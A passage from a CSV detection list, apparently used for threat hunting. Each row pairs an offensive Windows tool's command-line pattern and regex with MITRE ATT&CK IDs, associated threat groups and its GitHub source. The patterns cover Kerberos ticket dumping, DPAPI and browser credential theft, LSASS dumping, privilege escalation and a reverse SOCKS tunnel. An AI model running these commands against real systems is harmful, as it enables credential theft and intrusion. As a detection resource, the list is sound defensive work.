no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4399" "*.exe certificates /mkfile:*.txt*",".{0,1000}\.exe\scertificates\s\/mkfile\:.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4400" "*.exe certificates /unprotect*",".{0,1000}\.exe\scertificates\s\/unprotect.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4401" "*.exe Certify -action find -enrolleeSuppliesSubject -clientAuth*",".{0,1000}\.exe\sCertify\s\-action\sfind\s\-enrolleeSuppliesSubject\s\-clientAuth.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","4402" "*.exe Certify -action find*",".{0,1000}\.exe\sCertify\s\-action\sfind.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - 
TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","4403" "*.exe client *:* R:socks*",".{0,1000}\.exe\sclient\s.{0,1000}\:.{0,1000}\sR\:socks.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Chisel proxying - on our compromised target system we connect to this server and tell it to proxy all traffic over it via the reverse SOCKS5 tunnel.","T1071 - T1090 - T1102","N/A","N/A","Black Basta","C2","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4404" "*.exe -cmd ""cmd /c whoami""*",".{0,1000}\.exe\s\-cmd\s\""cmd\s\/c\swhoami\"".{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. 
It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","N/A","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","4405" "*.exe --CollectionMethods Session --Loop*",".{0,1000}\.exe\s\-\-CollectionMethods\sSession\s\-\-Loop.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","4406" "*.exe compute --sid * --kdskey *",".{0,1000}\.exe\scompute\s\-\-sid\s.{0,1000}\s\-\-kdskey\s.{0,1000}","offensive_tool_keyword","GoldenGMSA","GoldenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","N/A","7","2","144","22","2024-04-11T07:51:57Z","2022-02-03T10:32:05Z","4407" "*.exe computername=* command=* username=* password=* connectdrive=true*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\sconnectdrive\=true.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral 
Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","4408" "*.exe computername=* command=* username=* password=* elevated=taskmgr*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\selevated\=taskmgr.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","4409" "*.exe computername=* command=* username=* password=* elevated=winr*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\selevated\=winr.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","4410" "*.exe computername=* command=* username=* password=* exec=cmd*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\sexec\=cmd.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","4411" "*.exe computername=* command=* username=* password=* 
nla=true*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\s\snla\=true.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","4412" "*.exe computername=* command=* username=* password=* takeover=true*",".{0,1000}\.exe\scomputername\=.{0,1000}\scommand\=.{0,1000}\susername\=.{0,1000}\spassword\=.{0,1000}\s\stakeover\=true.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","N/A","N/A","10","10","1041","554","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z","4413" "*.exe COOKIES*",".{0,1000}\.exe\sCOOKIES.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","4414" "*.exe create /payload* /kb*",".{0,1000}\.exe\screate\s\/payload.{0,1000}\s\/kb.{0,1000}","offensive_tool_keyword","SharpWSUS","SharpWSUS is a CSharp tool for Lateral Movement through WSUS","T1047 - T1021.002 - T1021.003 - T1077 - T1069 - T1057 - T1105 - T1028 - T1070.004 - T1053 - T1086 - T1106 - T1059","TA0002 - TA0003 - TA0008","N/A","Black Basta","Lateral Movement","https://github.com/nettitude/SharpWSUS","1","0","N/A","N/A","N/A","5","452","77","2022-11-20T23:41:40Z","2022-05-04T08:27:57Z","4415" "*.exe createnetonly 
/program:*",".{0,1000}\.exe\screatenetonly\s\/program\:.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","N/A","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","4416" "*.exe credentials /pvk:*.pvk*",".{0,1000}\.exe\scredentials\s\/pvk\:.{0,1000}\.pvk.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","4417" "*.exe CREDIT_CARDS*",".{0,1000}\.exe\sCREDIT_CARDS.{0,1000}","offensive_tool_keyword","Adamantium-Thief","Decrypt chromium based browsers passwords - cookies - credit cards - history - bookmarks and autofill.","T1555 - T1003","TA0006","N/A","N/A","Credential Access","https://github.com/LimerBoy/Adamantium-Thief","1","0","N/A","N/A","10","9","818","205","2025-01-12T15:11:50Z","2020-03-01T06:50:15Z","4418" "*.exe -d * -u * -p * -m LDAPS*",".{0,1000}\.exe\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-m\sLDAPS.{0,1000}","offensive_tool_keyword","SharpLdapRelayScan","SharpLdapRelayScan is a tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authentication and it's a C# port of LdapRelayScan","T1557.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Discovery","https://github.com/klezVirus/SharpLdapRelayScan","1","0","N/A","network exploitation tool","7","1","81","18","2022-02-26T22:03:11Z","2022-02-12T08:16:59Z","4419" "*.exe -d 1 -c 
cmd.exe*",".{0,1000}\.exe\s\-d\s1\s\-c\scmd\.exe.{0,1000}","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","4420" "*.exe -d 3 -c *powershell -ep bypass*",".{0,1000}\.exe\s\-d\s3\s\-c\s.{0,1000}powershell\s\-ep\sbypass.{0,1000}","offensive_tool_keyword","printspoofer","Abusing Impersonation Privileges on Windows 10 and Server 2019","T1548.002 - T1055.001 - T1055.002","TA0005 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","N/A","10","10","1971","342","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z","4421" "*.exe DCSync -action list*",".{0,1000}\.exe\sDCSync\s\-action\slist.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","4422" "*.exe DCSync -action write -target *",".{0,1000}\.exe\sDCSync\s\-action\swrite\s\-target\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","4423" "*.exe --dll * --dump * --pid *",".{0,1000}\.exe\s\-\-dll\s.{0,1000}\s\-\-dump\s.{0,1000}\s\-\-pid\s.{0,1000}","offensive_tool_keyword","PPLSystem","creates a livedump of the machine through NtDebugSystemControl to extract 
the COM secret and context, to then inject inside this process.","T1003.002","TA0006","N/A","N/A","Credential Access","https://github.com/Slowerzs/PPLSystem","1","0","N/A","N/A","10","2","190","23","2024-05-29T18:33:35Z","2024-05-22T17:48:49Z","4425" "*.exe DomainGPPPassword*",".{0,1000}\.exe\sDomainGPPPassword.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","4426" "*.exe DontReqPreAuth -action list*",".{0,1000}\.exe\sDontReqPreAuth\s\-action\slist.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","4427" "*.exe DontReqPreAuth -action write -target *",".{0,1000}\.exe\sDontReqPreAuth\s\-action\swrite\s\-target\s.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","N/A","7","6","538","59","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z","4428" "*.exe dump /luid:* /service:krbtgt*",".{0,1000}\.exe\sdump\s\/luid\:.{0,1000}\s\/service\:krbtgt.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","4429" "*.exe dump /luid:0x5379f2 /nowrap*",".{0,1000}\.exe\sdump\s\/luid\:0x5379f2\s\/nowrap.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1558.001 - T1078.002 - T1550.003","TA0008 - TA0009 - TA0003","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","4430" "*.exe --dump -k * -u http*",".{0,1000}\.exe\s\-\-dump\s\-k\s.{0,1000}\s\-u\shttp.{0,1000}","offensive_tool_keyword","Dumpy","Reuse open handles to dynamically dump LSASS","T1003.001 - T1055.001 - T1083","TA0006","N/A","N/A","Credential Access","https://github.com/Kudaes/Dumpy","1","0","N/A","N/A","10","3","243","24","2024-04-04T07:42:26Z","2021-10-13T21:54:59Z","4431" "*.exe dump --key-name *",".{0,1000}\.exe\sdump\s\-\-key\-name\s.{0,1000}","offensive_tool_keyword","Shwmae","Shwmae is a tool focused on Windows Hello and DPAPI exploitation. 
It enables the enumeration - extraction and manipulation of Windows Hello keys and credentials","T1068 - T1078 - T1211 - T1003.004 - T1003.005 - T1003.002","TA0006 - TA0005 - TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/CCob/Shwmae","1","0","N/A","N/A","7","2","149","12","2025-01-27T14:36:07Z","2024-03-21T15:05:03Z","4432" "*.exe --effective --allow --outfile ""C:\Windows\Tasks\Rules.json""*",".{0,1000}\.exe\s\-\-effective\s\-\-allow\s\-\-outfile\s\""C\:\\Windows\\Tasks\\Rules\.json\"".{0,1000}","offensive_tool_keyword","SharpAppLocker","Useful when you already bypassed AppLocker initially and you don't want to leave PS logs","T1086 - T1569.002 - T1070.003","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpAppLocker","1","0","N/A","N/A","7","1","99","16","2022-12-08T11:06:40Z","2020-08-01T12:58:36Z","4433" "*.exe --effective --allow --rules=""FileHashRule,FilePathRule"" --outfile=*",".{0,1000}\.exe\s\-\-effective\s\-\-allow\s\-\-rules\=\""FileHashRule,FilePathRule\""\s\-\-outfile\=.{0,1000}","offensive_tool_keyword","SharpAppLocker","Useful when you already bypassed AppLocker initially and you don't want to leave PS logs","T1086 - T1569.002 - T1070.003","TA0005 - TA0006","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpAppLocker","1","0","N/A","N/A","7","1","99","16","2022-12-08T11:06:40Z","2020-08-01T12:58:36Z","4434" "*.exe elevatecmd runassystem *",".{0,1000}\.exe\selevatecmd\srunassystem\s.{0,1000}","offensive_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4435" "*.exe Enable-LinkedCmdshell*",".{0,1000}\.exe\sEnable\-LinkedCmdshell.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for 
penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4436" "*.exe Enable-LinkedCmdshell*",".{0,1000}\.exe\sEnable\-LinkedCmdshell.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4437" "*.exe --eventviewer *.exe*",".{0,1000}\.exe\s\-\-eventviewer\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","4438" "*.exe exec * cmd interactive*",".{0,1000}\.exe\sexec\s.{0,1000}\scmd\sinteractive.{0,1000}","offensive_tool_keyword","BesoToken","A tool to Impersonate logged on users without touching LSASS (Including non-Interactive sessions).","T1134 - T1003.002","TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/OmriBaso/BesoToken","1","0","N/A","N/A","10","1","93","14","2022-11-23T10:45:07Z","2022-11-21T01:07:51Z","4439" "*.exe exec hide 
*",".{0,1000}\.exe\sexec\shide\s.{0,1000}","offensive_tool_keyword","nircmd","Nirsoft tool - NirCmd is a small command-line utility that allows you to do some useful tasks without displaying any user interface","T1059 - T1036","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://www.nirsoft.net/utils/nircmd.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4440" "*.exe --exec --pid * --prog *cmd.exe*",".{0,1000}\.exe\s\-\-exec\s\-\-pid\s.{0,1000}\s\-\-prog\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","4441" "*.exe find -username * -dc-ip *",".{0,1000}\.exe\sfind\s\-username\s.{0,1000}\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1552.003 - T1110.003 - T1550.004 - T1649","TA0006 - TA0008 - TA0003","N/A","Dispossessor","Exploitation tool","https://github.com/ly4k/Certipy","1","0","N/A","N/A","10","10","2704","380","2024-08-19T17:33:04Z","2021-10-06T23:02:40Z","4442" "*.exe Get-DomainController -Domain * -Server * -Credential *",".{0,1000}\.exe\sGet\-DomainController\s\-Domain\s.{0,1000}\s\-Server\s.{0,1000}\s\-Credential\s.{0,1000}","offensive_tool_keyword","SharpView","C# implementation of harmj0y's PowerView","T1018 - T1482 - T1087.002 - T1069.002","TA0007 - TA0003 - TA0001","N/A","Conti - APT29","Discovery","https://github.com/tevora-threat/SharpView/","1","0","N/A","N/A","10","10","1032","196","2024-03-22T16:34:09Z","2018-07-24T21:15:04Z","4444" "*.exe Get-Hash -Instance * -ip *",".{0,1000}\.exe\sGet\-Hash\s\-Instance\s.{0,1000}\s\-ip\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory 
environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4445" "*.exe Get-Hash -Instance * -ip *",".{0,1000}\.exe\sGet\-Hash\s\-Instance\s.{0,1000}\s\-ip\s.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4446" "*.exe Get-LinkedServers -Instance *",".{0,1000}\.exe\sGet\-LinkedServers\s\-Instance\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4447" "*.exe Get-LinkedServers -Instance *",".{0,1000}\.exe\sGet\-LinkedServers\s\-Instance\s.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - 
T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4448" "*.exe Get-SQLInstanceDomain*",".{0,1000}\.exe\sGet\-SQLInstanceDomain.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4449" "*.exe Get-SQLInstanceDomain*",".{0,1000}\.exe\sGet\-SQLInstanceDomain.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4450" "*.exe Get-Sysadmins -Instance *",".{0,1000}\.exe\sGet\-Sysadmins\s\-Instance\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - 
T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4451" "*.exe Get-Sysadmins -Instance *",".{0,1000}\.exe\sGet\-Sysadmins\s\-Instance\s.{0,1000}","offensive_tool_keyword","SharpSQL","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4452" "*.exe -gettgs -luid:*",".{0,1000}\.exe\s\-gettgs\s\-luid\:.{0,1000}","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tool","https://github.com/foxlox/GIUDA","1","0","N/A","N/A","9","5","469","68","2025-03-30T20:42:43Z","2023-07-19T15:37:07Z","4453" "*.exe Get-UserPrivs -Instance *",".{0,1000}\.exe\sGet\-UserPrivs\s\-Instance\s.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","SharpSQL","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","4454" "*.exe Get-UserPrivs -Instance 
